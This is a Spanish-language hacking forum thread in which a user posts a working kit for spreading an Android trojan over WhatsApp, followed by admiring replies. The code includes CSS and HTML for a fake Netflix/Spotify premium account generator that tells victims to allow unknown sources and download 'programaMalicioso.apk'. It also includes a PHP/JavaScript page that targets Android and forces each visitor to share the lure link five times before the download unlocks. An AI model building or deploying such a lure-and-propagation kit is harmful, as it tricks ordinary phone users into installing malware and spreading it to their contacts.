Propagación de Malware en Android a través de Whatsapp

Iniciado por rollth, Febrero 01, 2018, 03:19:44 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Febrero 01, 2018, 03:19:44 PM Ultima modificación: Abril 01, 2018, 10:19:11 AM por rollth
Muy buenas Underc0ders,

hoy quería mostrar una técnica que llevo viendo mucho tiempo, en la cual se difunde algo con ingeniería social y forzándote a enviar Whatsapp para poder utilizar alguna herramienta, y así poder mostrarte publicidad. En este caso en lugar de mostrar publicidad vamos a hacer que la víctima descargue una aplicación maliciosa, para estoy yo voy a configurar un troyano con No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.



Yo además de esto he creado una interfaz gráfica para poder engañar al usuario, simulando un generador de cuentas premium tanto en Netflix como en Spotify.



Una vez hecho esto vamos a crear una página donde indique como descargar y usar esta aplicación, al ser una infección en Android tendremos que decirle al usuario que active la opción de aceptar apk's externas a Google Play. Así ha quedado en mi caso.

estilo.css

Código: css
body{
background-color: black;
}

h1{
color: white;
font-family: 'PT Sans';
}

h2{
color: red;
font-family: 'PT Sans';
}

h3{
color: white;
font-family: 'PT Sans';
}

p{
color: white;
font-family: 'PT Sans';
}


.boton_1{
    text-decoration: none;
    padding: 3px;
    padding-left: 10px;
    padding-right: 10px;
    font-family: helvetica;
    font-weight: 300;
    font-size: 25px;
    font-style: italic;
    color: #006505;
    background-color: #82b085;
    border-radius: 15px;
    border: 3px double #006505;
}
.boton_1:hover{
    opacity: 0.6;
    text-decoration: none;
}


instalacionAndroid.html

Código: html5
<html>
<head>
<title>Instalar Generador de cuentas Spotify/Netflix para Android</title>
<link REL="StyleSheet" href="estilo.css" type="text/css" MEDIA="screen">
</head>
<body>
<div align="center">
<h1>GUIA DE USO GENERADOR DE CUENTAS PREMIUM</h1>
<h2>Usar la aplicación generadora de cuentas Premium para Spotify y para Netflix es muy sencillo.</h2></br><p>
- PASO 1: Elegir en qué plataforma quiere crear la cuenta.</br></br>
- PASO 2: Añadir el usuario y contraseña que quiera usar.</br></br>
- PASO 3: Pulsar el botón dado para crear la cuenta.</br></br>
- PASO 4: Esperar varios minutos.</br></br>
- PASO 5: Entrar con dicho usuario y contraseña en la plataforma elegida.</br></br></p>

<img src="ImagenRegistro.png">
<h1>GUIA INSTALACION GENERADOR DE CUENTRAS PREMIUM</h1>
<h2>Para instalarlo deberás aceptar aplicaciones no provenientes de Google Play en tu móvil.</h2></br>
<p>
- PASO 1: Dirigete a la configuración de tu móvil.</br></br>
- PASO 2: Dirigete al submenú Seguridad / Aplicaciones.</br></br>
- PASO 3: Activa la opción "Fuentes desconocidas".</br></br>
<img src="http://img-17.ccm2.net/PoRKJZp-i7i9B_VAXJZ1C8gmofk=/2bd3dffc46954811a306b181e203cf9e/ccm-faq/itar-fuentes-desconocidas-android-s-.png"></br></br>
- PASO 4: Descarga la aplicación de este <a href="programaMalicioso.apk">link</a> y empieza a utilizarla.
</p>
</div>
</body>
</html>






El siguiente paso sería hacer la página que nos obligará a compartir el enlace y una vez compartido nos dará permiso para ir a lo que hicimos anteriormente, y así podran descargar nuestro "generador de contraseñas premium". Les dejo el código y a continuación lo voy explicando por partes.

index.php

Código: php
<html>
<head>
<title>COMPARTA LA APLICACION</title>
<link REL="StyleSheet" href="estilo.css" type="text/css" MEDIA="screen">
<script>
<?php
 
include('Mobile-Detect/Mobile_Detect.php');
$detect = new Mobile_Detect();
 
if ( $detect->isAndroidtablet() ) {
	$an = 1;
} elseif( $detect->isAndroid() ) {
	$an = 1;
} else{
	$an = 0;
}

echo '
var an = '.$an.';
'
?>

var compartido = 0;
function compartir(){
	compartido++;
	document.getElementById("comp").innerHTML = compartido;
	window.open("https://api.whatsapp.com/send?text=Aplicacion%20generadora%20de%20cuentas%20Premium%20totalmente%20gratuita.%20Funcional%20en%20NETFLIX%20y%20Sporify.%20Descarga%20ahora%20en:%20192.168.1.37/index.php");
}
function descargar(){
	if (compartido >= 5){
		location.href = "instalacionAndroid.html";	
	}
	else{
		alert("No ha compartido la herramienta suficientes veces.");	
	}
}
</script>
<script>
function comprobar(){
	if(an != 1){
		document.getElementById("body").innerHTML = "";
		alert("La aplicación es solo para Android");
	}
}
</script>
</head>
<body onload="comprobar()" id="body">
<div align="center">
<h1>Para poder descargar la aplicación debe compartirla 5 veces por Whatsapp</h1>
<h2>Veces compartida</h2> <h2 id="comp">0</h2> 
<button class="boton_1" onclick="compartir()">Compartir Por Whatsapp</button></br></br>
<button class="boton_1" onclick="descargar()">Descargar aplicación</button></br></br>
<img src="ImagenRegistro.png">
</div>
</body>
</html>


Bien, ahora vemos por partes. Lo primero que tenemos que entender es esto:

Código: php

include('Mobile-Detect/Mobile_Detect.php');
$detect = new Mobile_Detect();
 
if ( $detect->isAndroidtablet() ) {
	$an = 1;
} elseif( $detect->isAndroid() ) {
	$an = 1;
} else{
	$an = 0;
}



Lo que hace esto es comprobar si estamos utilizando Android u otro sistema operativo, y de ahí crea una variable que pasa a JavaScript, que luego utilizaremos para que la página se comporte de una forma u otra dependiendo de donde se esté corriendo.

Para ello he incluído una librería que podéis encontrar No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Código: javascript
function comprobar(){
	if(an != 1){
		document.getElementById("body").innerHTML = "";
		alert("La aplicación es solo para Android");
	}
}


Esta parte comprueba que la página se está visualizando desde un Android, en caso contrario manda una alerta y no muestra nada.



Código: javascript
var compartido = 0;
function compartir(){
	compartido++;
	document.getElementById("comp").innerHTML = compartido;
	window.open("https://api.whatsapp.com/send?text=Aplicacion%20generadora%20de%20cuentas%20Premium%20totalmente%20gratuita.%20Funcional%20en%20NETFLIX%20y%20Sporify.%20Descarga%20ahora%20en:%20192.168.1.37/index.php");
}
function descargar(){
	if (compartido >= 5){
		location.href = "instalacionAndroid.html";	
	}
	else{
		alert("No ha compartido la herramienta suficientes veces.");	
	}
}


Esta parte crea dos funciones, la primera es la que te hace compartir el mensaje por whatsapp, además tiene un contador que se va actualizando cada vez que compartes.

La segunda sirve para descargar, comprueba si lo has compartido las suficientes veces y en caso positivo te redirecciona al lugar donde puedes descargar la aplicación.

Para compartir la aplicación por Whatsapp se usa el siguiente link, donde texto es el texto del mensaje que deberán enviar.

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Una vez hecho esto veamos como quedaría.



Vemos que al darle al compartir nos manda a Whatsapp para enviar el mensaje de la siguiente forma.







Al compartir y volver veremos que el contador ha aumentado, entonces al llegar a 5 podremos descargar nuestra aplicación, en caso de pulsar el otro botón antes de haber compartido 5 veces nos saldrá una alerta y no nos dejará.



Ya estaría todo hecho, sé que esto se podría hacer mucho mejor, pero así es la idea básica de como funcionaría, si alguien quiere aportar código bienvenido es.

También me pueden seguir en Twitter si les hace ilusión: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Saludos.
RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Febrero 01, 2018, 03:30:02 PM #1
Muy bueno, además es bastante utilizado, así que es útil que la gente conozca la técnica.

Gracias @No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Un saludo.


Febrero 01, 2018, 03:44:24 PM #2
¡Genial aporte rollth!
Hace falta mucha ingeniería social pero la idea y el método usado es buenísimo.

Saludos
Febrero 01, 2018, 05:21:31 PM #3
Excelente Rolo! Como siempre.

No solo es un lujo el poder leerte sino que tambien hasta nos deja el css xD aporte 100%
Web: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Igm: /secureart
Telegram: @roaddhdc
Correo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Face: /roaddhdc
Twitter: @roaddhdc
Youtube: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Febrero 01, 2018, 05:40:46 PM #4
Muchas gracias a los 3 por vuestros comentarios, me alegra mucho que haya gustado :D

Saludos,
RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Febrero 02, 2018, 02:12:37 PM #5
¡Sencillamente excelente!
Creo que es el primer análisis sobre este tipo de propagación que veo.

Gracias por el aporte, Rolo.

Saludos.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Imprimir
Ir Arriba Páginas1
Acciones del Usuario